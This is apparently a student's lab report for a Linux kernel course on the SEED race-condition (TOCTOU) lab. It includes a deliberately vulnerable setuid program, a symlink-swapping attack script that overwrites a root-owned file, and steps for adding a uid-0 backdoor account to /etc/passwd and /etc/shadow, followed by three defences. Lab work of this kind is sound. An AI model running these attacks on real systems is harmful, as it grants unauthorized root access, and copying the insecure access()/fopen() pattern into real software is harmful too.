2020-2021-1 20209326 《Linux内核原理与分析》第十二周作业

作业信息

这个作业属于哪个课程 <2020-2021-1Linux内核原理与分析)>
这个作业要求在哪里 <2020-2021-1Linux内核原理与分析第十二周作业>
这个作业的目标 <竞态条件漏洞实验>
作业正文 <博客>

实验:竞态条件漏洞实验

1.实验准备:
由于本实验环境开启了针对竞态条件攻击的保护,所以需要先关掉保护。该选项意味着全域可写sticky位开启的文件夹是不能作为链接目标所在文件夹的。

sudo su
echo 0 > /proc/sys/fs/protected_symlinks
exit

新建我们的工作目录:

cd ~
mkdir seed

2.漏洞程序
在 /home/shiyanlou/seed 下新建 vulp.c 文件:

$ cd /home/shiyanlou/seed
$ sudo vi vulp.c

vulp.c

/* vulp.c */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        for(i=0; i < DELAY; i++){
            int a = i^2;
        }
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
}


这是一个 Set-UID 程序(root所有) 它将用户输入的字符串添加到文件 /tmp/XYZ 后,access() 会检查用户是否具备访问资源的权限,也就是说该函数检查real id而不是effective id。
这个程序第一眼看上去没有任何问题,但是这里有一个竞态条件漏洞。由于检查(access)与访问(fopen)之间存在时间间隙,所以检查与访问的就有可能不是同一个文件,即使它们的名字相同。如果一个恶意攻击者可以创建一个 /tmp/XYZ/ 链接指向 /etc/shadow,输入的字符串就会追加到shadow文件中去。

3.利用竞态条件漏洞做到以下2点:重写拥有者为root的任意文件、获取root权限
3.1重写拥有者为root的任意文件
3.1.1.首先创建如下所示的几个文件,注意这几个文件的权限和所有者 。

$ ls -l
-rw-rw-r-- 1 shiyanlou shiyanlou   10 Apr 23 13:33 append_text  《--VULP输入文件
-rw-rw-r-- 1 root      root         0 Apr 23 13:32 root_file  《--目标文件
-rw-rw-r-- 1 shiyanlou shiyanlou    0 Apr 23 13:45 tmp_file  《--助攻
-rwsr-xr-x 1 root      root      7403 Apr 23 13:27 vulp  《--漏洞文件
-rw-r--r-- 1 root      root       454 Apr 23 13:27 vulp.c

vulp.c 是在上面已经创建的,vulp 文件是编译 vulp.c 产生的文件,是我们的漏洞文件

sudo gcc vulp.c -o vulp

编译漏洞程序代码并将其设为SET-UID文件。设置suid只需运行以下命令:

sudo chmod u+s vulp

新建 root_file 文件,它是我们的目标文件:

sudo touch root_file 
sudo chmod g+w root_file

新建append_text 文件,在append_text文件中加入你想要在root_file里加入的任意内容,比如 shiyanlou :

vi append_text

新建 tmp_file 文件,这是我们的助攻文件:

touch tmp_file


3.1.2.创建检查时间戳的脚本check.sh,并将运行vulp的命令加入其中。

#!/bin/sh
#注意`不是单引号
old=`ls -l /home/shiyanlou/seed/root_file`
new=`ls -l /home/shiyanlou/seed/root_file`
while [ "$old" = "$new" ]
do
    ./vulp < append_text
    new=`ls -l /home/shiyanlou/seed/root_file`
done
echo "STOP... The file has been changed"

不要忘记给脚本运行权限:

sudo chmod u+x check.sh

3.1.3.创建攻击代码attacker.c并编译

int main()
{
    while(1){
        system("ln -sf /home/shiyanlou/seed/tmp_file /tmp/XYZ");
        system("ln -sf /home/shiyanlou/seed/root_file /tmp/XYZ");
    }
    return 0;
}

编译命令如下:

gcc attacker.c -o attacker

此时文件夹目录的情况:

3.1.4.点击 File-> Open Tab 在终端里新建标签页,先运行 attacker 再运行check.sh
可以看到内容已经被写进root_file中了。(顺序倒过来的话会导致调用fopen生成一个root权限的/tmp/XYZ文件,那样攻击就失败了。)

3.2:获取root权限
3.2.1.生成shadow密码

mkpasswd -m sha-512 revolc

3.2.2.格式替换

在 /etc/passwd 文件中添加:
-------------
clover:x:0:0:Lucy,,,:/home/clover:/bin/bash
在 /etc/shadow 文件中添加:
-------------
clover:$6$IUnzPsiExE$uBye.TijpyM4MMmDG524.M9PvULWoI/gFNRmMb0HlN5a58Xw3pK59GtyK/NtuBNvHHAYu5nbc6Vn8o6CkBV6g1:13450:0:99999:7:::


4.保护机制A:重复
增加更多的竞态条件,这样就能减小攻击者攻击成功的概率了。该机制的基础思想是重复access和fopen函数的次数。
修改 vulp.c 代码如下:

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        if(!access(fn, W_OK)){
            /*嵌套n层*/
            fp = fopen(fn, "a+");
            fwrite("\n", sizeof(char), 1, fp);
            fwrite(buffer, sizeof(char), strlen(buffer), fp);
            fclose(fp);
        }
        else printf("No permission \n");
    }
    else printf("No permission \n");
}



攻击失败

5.保护机制B:最小权限原则
该程序的根本问题就在于它违反了最小权限原则,程序员认识到运行这个程序的用户可能权利过大,所以引入access函数进行限制,但也同时引入了竞态条件的隐患。
更好的方法是使用setuid系统调用暂时禁止root权限,当需要时再恢复。请以此法修复漏洞,再重复之前的攻击,观察结果并解释。
修改 vulp.c 代码如下:

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );

    uid_t euid = geteuid(); 
    seteuid(getuid());

    for (i=0; i < DELAY; i++){
            int a = i^2;
    }

    if (fp = fopen(fn, "a+")){
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");

    seteuid(euid);
}



攻击失败

6.保护机制C:Ubuntu内置方案
开启保护机制的命令如下:

$ sudo su
$ echo 1 > /proc/sys/fs/protected_symlinks
$ exit


攻击失败

总结

竞态条件是指多个线程同时访问或者操作同一块数据,运行的结果依赖于不同线程访问数据的顺序。如果一个拥有root权限的程序存在竞态条件漏洞的话,攻击者可以通过运行一个平行线程与漏洞程序竞争,以此改变该程序的行为。在本实验中将利用竞态条件漏洞获得root权限。除了攻击之外,还将学习如何制定保护方案抵御该类攻击。

posted @ 2020-12-22 16:56  20209326  阅读(156)  评论(0编辑  收藏  举报